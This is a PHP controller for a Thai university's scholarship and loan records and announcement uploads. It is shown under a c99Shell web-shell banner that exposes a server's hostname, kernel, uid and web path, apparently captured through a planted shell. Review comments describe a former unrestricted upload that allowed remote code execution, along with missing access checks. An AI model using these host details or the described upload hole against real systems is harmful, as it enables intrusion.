!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/esa/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)


Viewing file:     borrow.php (16.99 KB)      -rwxr-xr-x
<?php
include('sa_controller.php');
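/**
 * Controller for student scholarship/loan ("borrow") records and for the
 * announcement documents (news items plus uploaded files) that go with them.
 *
 * The class relies on the loader, input, session, form_validation, upload and
 * db objects and on output()/output_popup(), none of which are defined here.
 *
 * NOTE(review): no authentication, role, ownership or CSRF check is visible in
 * this class. Every write/delete method below acts on identifiers taken
 * straight from POST, so it depends entirely on whatever Sa_controller and the
 * framework configuration enforce - confirm before relying on it.
 * NOTE(review): callback_checkFrDate and callback_checkupload are referenced in
 * validation rules but are not defined in this class - presumably inherited.
 */
class Borrow extends Sa_controller
{
    // ##### start callback

    /**
     * Form-validation callback for the academic year field: the value must be
     * non-empty, exactly 4 characters long and present in the term config.
     *
     * @param string $str Submitted academic year.
     * @return bool TRUE when a matching term-config row exists.
     */
    function checkAcY($str)
    {
        $this->load->model($this->config->item("rg_folder").'mo_rg_termconfig', 'tmc');

        if ($str == '') {
            $this->form_validation->set_message('checkAcY', 'กรุณาป้อน%s');
            return false;
        }
        if (strlen($str) != 4) {
            $this->form_validation->set_message('checkAcY', '%sจะต้องเท่ากับ 4 หลัก');
            return false;
        }

        // Hit the database only once the cheap format checks have passed.
        $qu_tmc = $this->tmc->qryTmc(array('tmcAcY' => $str), '', '');
        if ($qu_tmc->num_rows()) {
            return true;
        }

        $this->form_validation->set_message('checkAcY', '%sไม่ถูกต้อง');
        return false;
    }

    // ##### end callback

    /**
     * Autocomplete endpoint: prints one suggestion per line for the posted
     * search term "q".
     *
     * NOTE(review): "q" reaches the model unchanged and the column values are
     * echoed without escaping. Confirm that getAuto() binds the term and that
     * the client inserts these lines as text rather than as HTML.
     *
     * @param mixed $mode 1 = scholarship name, 2 = source, 3 = type; any other
     *                    value prints nothing.
     */
    function getBrw_source($mode)
    {
        $this->load->model($this->config->item('sa_folder').'sa_borrow_model', 'brw');
        $rs = $this->brw->getAuto($this->input->post('q'), $mode);

        // Loose comparison kept on purpose: $mode normally arrives as a string.
        if ($mode == 1) {
            $column = 'brw_scholarship';
        } else if ($mode == 2) {
            $column = 'brw_source';
        } else if ($mode == 3) {
            $column = 'brw_type';
        } else {
            return;
        }

        foreach ($rs->result() as $row) {
            echo $row->$column."\n";
        }
    }

    /**
     * Renders the borrow entry/search form (view "v_add_borrow") with the term
     * options, the posted search filters and the matching borrow rows.
     */
    function brw_input()
    {
        $this->load->model($this->config->item('sa_folder').'sa_borrow_model', 'brw');
        $this->load->model($this->config->item("rg_folder").'mo_rg_term', 'tm');

        $rs_tm = $this->tm->get_options('', '', '', 'y');
        $rs_tm[''] = '-- เลือก ---';

        $data = array();
        $data['rs_tm'] = $rs_tm;
        $data['brw_acY'] = $this->session->userdata('acY');

        // Missing or empty filters are normalised to '' for the view and the queries.
        foreach (array('acY_search', 'tmId_search', 'v_search') as $filter) {
            $posted = $this->input->post($filter);
            $data[$filter] = $posted ? $posted : '';
        }

        $this->brw->brw_id = $this->input->post('brw_id');
        $qu_brw = $this->brw->get_by_key_2();
        if ($qu_brw->num_rows()) {
            $data['qu_brw'] = $qu_brw;
        }

        $data['rs_brw'] = $this->brw->get_by_acYtmIdstd($data['acY_search'], $data['tmId_search'], $data['v_search']);
        // NOTE(review): this unconditionally replaces the 'qu_brw' set from
        // get_by_key_2() above, so that lookup never reaches the view. Kept
        // as-is because the key the view expects is not visible here.
        $data['qu_brw'] = $this->brw->get_by_sumacYtmIdstd($data['acY_search'], $data['tmId_search'], $data['v_search']);

        $this->output("v_add_borrow", $data);
    }

    /**
     * Form-validation callback: a request number must be unique unless it is
     * the number already stored on the record being edited.
     *
     * @param string $str Submitted request number.
     * @return bool FALSE when another record already uses the number.
     */
    function brw_req_no_check($str)
    {
        $this->load->model($this->config->item('sa_folder').'sa_borrow_model', 'brw');

        $brw = $this->brw;
        $brw->brw_id = trim($this->input->post('brw_id'));
        $brw->get_by_key(TRUE);

        // Compare as strings: with a loose != two numeric strings such as
        // "0012" and "12" count as equal, which would skip the duplicate
        // check when a number is edited to a different spelling.
        $current = (string) $brw->brw_req_no;
        $wanted = trim($str);
        if ($current === $wanted) {
            return TRUE;
        }

        $rs = $brw->getByReq_no($wanted);
        if ($rs->num_rows() > 0) {
            $this->form_validation->set_message('brw_req_no_check', 'เลขที่คำร้องนี้มีแล้วในระบบ');
            return FALSE;
        }

        return TRUE;
    }

    /**
     * Prints whether the given value is numeric.
     *
     * NOTE(review): looks like a leftover debugging method; it is a plain
     * controller method, so it may be reachable by URL - confirm and remove if
     * nothing uses it.
     *
     * @param mixed $age Value to test.
     */
    function test($age)
    {
        if (is_numeric($age)) {
            echo "your age is $age";
            return;
        }

        echo "your not numeric";
    }

    /**
     * Form-validation callback for the amount: empty is accepted, otherwise
     * the value must be numeric and lie between 0 and 99999.99.
     *
     * @param string $str Submitted amount.
     * @return bool
     */
    function brw_check_amt($str)
    {
        if ($str == "") {
            return TRUE;
        }

        // Check the type before the range: comparing a non-numeric string with
        // a number depends on the PHP version and used to select the wrong
        // message for input such as "100000abc".
        if (!is_numeric($str)) {
            $this->form_validation->set_message('brw_check_amt', 'จำนวนเงิน ต้องเป็นเลขเท่านั้น');
            return FALSE;
        }
        if ($str > 99999.99) {
            $this->form_validation->set_message('brw_check_amt', 'จำนวนเงินต้องน้อยกว่า 100,000 ');
            return FALSE;
        }
        if ($str < 0) {
            $this->form_validation->set_message('brw_check_amt', 'จำนวนเงิน ต้องเป็นเลขที่มากกว่า 0');
            return FALSE;
        }

        return TRUE;
    }

    /**
     * Form-validation callback: the year of the posted date field plus 543
     * must not be lower than the submitted academic year.
     *
     * The date is split on "/" and its third part is taken as the year; 543
     * is presumably the Gregorian-to-Buddhist-era offset.
     *
     * @param string $str   Submitted academic year.
     * @param string $field Name of the posted date field to compare against.
     * @return bool
     */
    function brw_check_year($str, $field)
    {
        $parts = explode("/", $this->input->post($field));

        // An empty or malformed date has no third part. Treat the year as 0
        // instead of reading an undefined offset; the comparison result is
        // the same as before, without the notice.
        $receive_year = isset($parts[2]) ? $parts[2] : 0;

        if (($receive_year + 543) >= $str) {
            return TRUE;
        }

        $this->form_validation->set_message('brw_check_year', 'ปีการศึกษาที่ขอกู้ยืม จะต้องไม่น้อยกว่า หรือเท่ากับปีที่รับทุน');
        return FALSE;
    }

    /**
     * Validates the borrow form and inserts or updates one borrow record per
     * student listed in the posted "std" / "wk11_co" value.
     *
     * The student value is a "###"-separated list whose items start with a
     * student code followed by ":". Items whose code is unknown are skipped
     * silently. All writes share one database transaction.
     */
    function brw_insert_update()
    {
        $list_url = $this->config->item('sa_folder').'borrow/brw_input';

        if ($this->input->post('btnCancel')) { // cancel button clicked
            redirect($list_url);
            return;
        }

        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div>', '</div>');

        // The presence of brw_id decides whether this is an update (student
        // comes from "std") or an insert (student comes from "wk11_co").
        $brw_id = $this->input->post('brw_id');
        $student_field = $brw_id ? 'std' : 'wk11_co';

        $rules = array(
            array('brw_id', ' ', 'trim|xss_clean'),
            array($student_field, 'รหัส/ชื่อ-สกุลนักศึกษา', 'trim|required|xss_clean'),
            array('brw_req_no', 'เลขที่คำร้องขอรับทุน', 'trim|required|xss_clean|callback_brw_req_no_check'),
            array('brw_no', 'เลขที่สัญญา', 'trim|xss_clean'),
            array('brw_scholarship', 'ชื่อทุน', 'trim|required|xss_clean'),
            array('brw_source', 'แหล่งทุน/หน่วยงาน', 'trim|required|xss_clean'),
            array('brw_type', 'ประเภททุน', 'trim|required|xss_clean'),
            array('brw_amt', 'จำนวนเงิน', 'trim|xss_clean|callback_brw_check_amt'),
            array('brw_receive_date', 'วันที่ได้รับทุน', 'trim|xss_clean'),
            array('brw_status', 'สถานะการได้รับทุน', 'trim|required|xss_clean'),
            array('brw_note', 'หมายเหตุ', 'trim|xss_clean'),
            array('brw_acY', 'ปีการศึกษาที่ขอกู้ยืม', 'callback_checkAcY|callback_brw_check_year[brw_receive_date]'),
            array('brw_tmId', 'ภาคการศึกษาที่ขอกู้ยืม', 'trim|required|xss_clean'),
        );
        foreach ($rules as $rule) {
            $this->form_validation->set_rules($rule[0], $rule[1], $rule[2]);
        }

        if ($this->form_validation->run() == FALSE) {
            $this->brw_input();
            return;
        }

        // Re-read the key after validation so the trimmed/filtered value is
        // the one used for the lookup and the update.
        $brw_id = $this->input->post('brw_id');

        $this->db->trans_begin();

        $this->load->model($this->config->item('rg_folder').'mo_rg_student', 'std');
        $this->load->model($this->config->item('sa_folder').'sa_borrow_model', 'brw');

        $students = $this->input->post('std') ? $this->input->post('std') : $this->input->post('wk11_co');
        $trimmed_fields = array('brw_req_no', 'brw_no', 'brw_scholarship', 'brw_source', 'brw_type', 'brw_status', 'brw_note');

        foreach (explode("###", $students) as $value) {
            $std = explode(":", $value);
            $qu_std = $this->std->qryStd(array('stdCode' => $std[0]));
            if (!$qu_std->num_rows()) {
                continue; // unknown student code: nothing is written for it
            }

            $this->brw->brw_id = $brw_id;
            $this->brw->get_by_key(TRUE);

            $this->brw->brw_std_id = $qu_std->row()->stdId;
            foreach ($trimmed_fields as $field) {
                $this->brw->$field = trim($this->input->post($field));
            }
            $this->brw->brw_amt = $this->input->post('brw_amt');
            $this->brw->brw_acY = $this->input->post('brw_acY');
            $this->brw->brw_tmId = $this->input->post('brw_tmId');
            $this->brw->brw_receive_date = splitDateForm2($this->input->post('brw_receive_date'), '/');
            $this->brw->brw_update_date = date('Y-m-d H:i:s');
            $this->brw->brw_update_us_login = $this->session->userdata('UsLogin');

            if ($brw_id) {
                $this->brw->update();
            } else {
                $this->brw->brw_create_date = date('Y-m-d H:i:s');
                $this->brw->brw_create_us_login = $this->session->userdata('UsLogin');
                $this->brw->insert();
            }
        }

        if ($this->db->trans_status() === false) {
            $this->db->trans_rollback();
        } else {
            $this->db->trans_commit();
        }

        redirect($list_url);
    }

    /**
     * Deletes the borrow record whose id is posted as "brw_id", then returns
     * to the borrow form.
     */
    function brw_delete()
    {
        $this->load->model($this->config->item('sa_folder').'sa_borrow_model', 'brw');

        // Never call delete() without a key: what the model does with an
        // empty id is not visible from here.
        $brw_id = $this->input->post('brw_id');
        if ($brw_id) {
            $this->brw->brw_id = $brw_id;
            $this->brw->delete();
        }

        redirect($this->config->item('sa_folder').'borrow/brw_input');
    }

    /**
     * Renders the announcement list/form (view "v_borrowFile") for the
     * scholarship work area, newest first, plus the item being edited.
     */
    function brw_file()
    {
        $this->load->model($this->config->item('rg_folder').'mo_rg_news', 'nw');

        $con_rs_nw = array(
            'nwSystem'  => $this->config->item('sa_system'),
            'nwWorkFor' => $this->config->item('nw_for_scholar'),
        );
        $ord_rs_nw = array('nwCreateDate' => 'DESC');

        $data = array();
        $data['rs_nw'] = $this->nw->qryNw($con_rs_nw, $ord_rs_nw);

        // Update case: load the item selected for editing.
        $nwId = $this->input->post('nwId');
        $data['qu_nw'] = $this->nw->qryNw(array('nwId' => $nwId));

        $this->output("v_borrowFile", $data);
    }

    /**
     * Renders the popup view "v_borrowDetailFile" for the announcement posted
     * as "nwId", together with its uploaded files.
     */
    function brw_showDetail()
    {
        $this->load->model($this->config->item("rg_folder").'mo_rg_news', 'nw');
        $this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload', 'nwu');

        $nwId = $this->input->post('nwId');

        $data = array();
        $data['qu_nw'] = $this->nw->qryNwJoinUmsystem(array('nwId' => $nwId));
        $data['rs_nwu'] = $this->nwu->qryNwu(array('nwuNwId' => $nwId));

        $this->output_popup("v_borrowDetailFile", $data);
    }

    /**
     * Validates the announcement form and inserts or updates the announcement,
     * then redirects to its attachment page.
     *
     * A new announcement is rejected as a duplicate when one with the same
     * title, system and creation date already exists.
     */
    function brw_file_insert_update()
    {
        $this->load->model($this->config->item('rg_folder').'mo_rg_news', 'nw');

        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div>', '</div>');
        $this->form_validation->set_rules('nwId', ' ', 'trim|xss_clean');
        $this->form_validation->set_rules('nwTitle', ' ', 'trim|required|xss_clean');
        $this->form_validation->set_rules('dpUsed', ' ', 'trim|required|xss_clean');

        // dpUsed == 'N' means an explicit date range was entered.
        $dpUsed = $this->input->post('dpUsed');
        $has_dates = ($dpUsed == 'N');
        if ($has_dates) {
            $this->form_validation->set_rules('nwFrDate', ' ', 'trim|callback_checkFrDate[nwToDate]|xss_clean');
            $this->form_validation->set_rules('nwToDate', ' ', 'trim|xss_clean');
        }

        $this->form_validation->set_rules('nwDetail', ' ', 'trim|xss_clean');
        $this->form_validation->set_rules('nwAnnoucedBy', ' ', 'trim|required|xss_clean');

        if ($this->form_validation->run() == FALSE) {
            if ($has_dates) {
                $this->load->vars(array('passvalid' => 1));
            }
            $this->brw_file();
            return;
        }

        // Read the fields only after run(): the trim/xss_clean rules are
        // applied to the posted data during validation, so values captured
        // earlier would be stored unfiltered.
        $nwId = $this->input->post('nwId');
        $nwTitle = $this->input->post('nwTitle');
        $nwDetail = $this->input->post('nwDetail');
        $nwAnnoucedBy = $this->input->post('nwAnnoucedBy');
        $nwCreateDate = getNowDate();
        if ($has_dates) {
            $nwFrDate = splitDateForm2($this->input->post('nwFrDate'), '-');
            $nwToDate = splitDateForm2($this->input->post('nwToDate'), '-');
        } else {
            $nwFrDate = '0000-00-00';
            $nwToDate = '0000-00-00';
        }

        $this->db->trans_begin();

        if ($nwId) {
            $this->nw->nwId = $nwId;
            $this->nw->get_by_key(TRUE);

            $this->nw->nwTitle = $nwTitle;
            $this->nw->nwFrDate = $nwFrDate;
            $this->nw->nwToDate = $nwToDate;
            $this->nw->nwAnnoucedBy = $nwAnnoucedBy;
            $this->nw->nwDetail = $nwDetail;
            // NOTE(review): an update also rewrites the creation date and
            // creator; kept as found, but confirm this is intended.
            $this->nw->nwCreateDate = date('Y-m-d H:i:s');
            $this->nw->nwCreateUserId = $this->session->userdata('UsLogin');
            $this->nw->nwUpdateDate = date('Y-m-d H:i:s');
            $this->nw->nwUpdateUserId = $this->session->userdata('UsLogin');
            $this->nw->update();

            $id = $nwId;
        } else {
            $con_qu_nw = array(
                'nwTitle'      => $nwTitle,
                'nwSystem'     => $this->config->item('sa_system'),
                'nwCreateDate' => $nwCreateDate."%",
            );
            $qu_nw = $this->nw->qryNw($con_qu_nw);
            if ($qu_nw->num_rows() != 0) {
                // Duplicate data: close the open transaction explicitly
                // before leaving instead of abandoning it.
                $this->db->trans_rollback();
                redirect($this->config->item("sa_folder")."borrow/brw_file");
                return;
            }

            $this->nw->nwId = "";
            $this->nw->nwSystem = $this->config->item('sa_system');
            $this->nw->nwTitle = $nwTitle;
            $this->nw->nwFrDate = $nwFrDate;
            $this->nw->nwToDate = $nwToDate;
            $this->nw->nwAnnoucedBy = $nwAnnoucedBy;
            $this->nw->nwPicture = '';
            $this->nw->nwDetail = $nwDetail;
            $this->nw->nwCreateDate = date('Y-m-d H:i:s');
            $this->nw->nwCreateUserId = $this->session->userdata('UsLogin');
            $this->nw->nwUpdateDate = date('Y-m-d H:i:s');
            $this->nw->nwUpdateUserId = $this->session->userdata('UsLogin');
            $this->nw->nwWorkFor = $this->config->item('nw_for_scholar');
            $this->nw->insert();

            $id = $this->nw->last_insert_id();
        }

        if ($this->db->trans_status() === false) {
            $this->db->trans_rollback();
        } else {
            $this->db->trans_commit();
        }

        redirect($this->config->item("sa_folder")."borrow/brw_attachfile/$id");
    }

    /**
     * Renders the attachment page (view "v_borrowFileAttach") for one
     * announcement and its uploaded files.
     *
     * @param mixed $id Announcement id, taken from the URL.
     */
    function brw_attachfile($id = 0)
    {
        $this->load->model($this->config->item("rg_folder").'mo_rg_news', 'nw');
        $this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload', 'nwu');

        $this->nw->nwId = $id;

        $data = array();
        $data['qu_nw'] = $this->nw->get_by_key();
        $data['rs_nwu'] = $this->nwu->qryNwu(array('nwuNwId' => $id));

        $this->output("v_borrowFileAttach", $data);
    }

    /**
     * Form-validation callback: a document name must be non-empty and not
     * already used by another file of the same announcement.
     *
     * @param string $str Submitted document name.
     * @return bool
     */
    function checkDocName($str)
    {
        $nwId = $this->input->post('nwId');

        $this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload', 'nwu');

        if ($str == "") {
            $this->form_validation->set_message('checkDocName', 'กรุณาป้อน%s');
            return false;
        }

        $rs_nwu = $this->nwu->qryNwu(array(
            'nwuFileName' => $str,
            'nwuNwId'     => $nwId,
        ));
        if ($rs_nwu->num_rows()) {
            $this->form_validation->set_message('checkDocName', 'ชื่อเอกสารซ้ำ กรุณาป้อนชื่อใหม่');
            return false;
        }

        return true;
    }

    /**
     * Stores an uploaded document for an announcement and records it in the
     * file table.
     *
     * Security: the upload previously accepted every file type
     * (allowed_types = '*'). Because the stored name keeps the client's file
     * extension, a script file could be placed in the upload directory; if
     * that directory is served by the web server with script execution
     * enabled, that is remote code execution. Uploads are now limited to a
     * document/image allow-list.
     * NOTE(review): the extension list below is a constructed default - adjust
     * it to the document types actually needed. Independently of this code,
     * keep the upload directory outside the web root or disable script
     * execution in it.
     */
    function brw_attachFile_insert_update()
    {
        $this->load->model($this->config->item("rg_folder").'mo_rg_news', 'nw');
        $this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload', 'nwu');

        $this->load->library('form_validation');
        $this->form_validation->set_error_delimiters('<div class="error">', '</div>');
        $this->form_validation->set_rules('nwId', ' ', 'trim|required|xss_clean');
        $this->form_validation->set_rules('docName', ' ', 'trim|required|callback_checkDocName|xss_clean');
        $this->form_validation->set_rules('docFile', ' ', 'trim|xss_clean');

        $this->load->library('upload');

        $path = '';          // stored name of the last successful upload
        $stored = array();   // full paths written during this request
        foreach ($_FILES as $key => $value) {
            $config = array(
                'upload_path'   => $this->config->item('rg_upload_docNews'),
                // Allow-list instead of '*': see the method comment.
                'allowed_types' => 'pdf|doc|docx|xls|xlsx|ppt|pptx|txt|jpg|jpeg|png|gif',
                'max_size'      => $this->config->item('rg_upload_maxsize'),
                'file_name'     => "file_".date('dmY_His'),
            );

            $this->upload->initialize($config);
            if ($this->upload->do_upload($key)) {
                $upload_data = $this->upload->data();
                $path = $upload_data['file_name'];
                $stored[] = $upload_data['full_path'];
            } else {
                // Surface the upload error through the validation run below.
                $this->form_validation->set_rules('docFile', trim($this->upload->display_errors()), 'callback_checkupload');
            }
        }

        $nwId = $this->input->post('nwId');
        $valid = ($this->form_validation->run() == true);

        if (!$valid || $path === '') {
            // Nothing will be recorded, so do not leave unreferenced files
            // behind in the upload directory.
            foreach ($stored as $orphan) {
                if (is_file($orphan)) {
                    unlink($orphan);
                }
            }
            $this->brw_attachfile($nwId);
            return;
        }

        $this->db->trans_begin();

        // Check the document name: count existing files with the same name.
        $rs_nwu = $this->nwu->qryNwu(array(
            'nwuNwId'     => $nwId,
            'nwuFileName' => $this->input->post('docName'),
        ));
        $file_version = $rs_nwu->num_rows();

        $this->nwu->nwuId = "";
        $this->nwu->nwuSeq = $this->nwu->getNextSeqByNwuNwId($nwId);
        $this->nwu->nwuNwId = $nwId;
        $this->nwu->nwuFileName = $this->input->post('docName').(($file_version == 0) ? "" : "[".$file_version."]");
        $this->nwu->nwuPath = $path;
        $this->nwu->nwuCreateDate = date('Y-m-d H:i:s');
        $this->nwu->nwuUserId = $this->session->userdata('UsLogin');
        $this->nwu->insert();

        if ($this->db->trans_status() === false) {
            $this->db->trans_rollback();
        } else {
            $this->db->trans_commit();
        }

        redirect($this->config->item("sa_folder")."borrow/brw_attachfile/$nwId");
    }

    /**
     * Deletes the file record posted as "nwuId", then returns to the
     * attachment page of the announcement posted as "nwuNwId".
     *
     * NOTE(review): only the database row is removed here; whether the stored
     * file is deleted from disk depends on the model - confirm.
     */
    function brw_deleteFile()
    {
        $this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload', 'nwu');

        $nwuId = $this->input->post('nwuId');
        $nwuNwId = $this->input->post('nwuNwId');

        // Never call delete() without a key.
        if ($nwuId) {
            $this->nwu->nwuId = $nwuId;
            $this->nwu->delete();
        }

        redirect($this->config->item("sa_folder")."borrow/brw_attachfile/$nwuNwId");
    }

    /**
     * Deletes the announcement posted as "nwId" together with all of its file
     * records, then returns to the announcement list.
     */
    function brw_deleteFileHead()
    {
        $this->load->model($this->config->item("rg_folder").'mo_rg_news', 'nw');
        $this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload', 'nwu');

        $nwId = $this->input->post('nwId');

        // An empty id must not reach delNwu()/delete(): a condition on an
        // empty key could match more rows than intended.
        if ($nwId) {
            $this->nwu->delNwu(array('nwuNwId' => $nwId));

            $this->nw->nwId = $nwId;
            $this->nw->delete();
        }

        redirect($this->config->item('sa_folder').'borrow/brw_file');
    }
}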
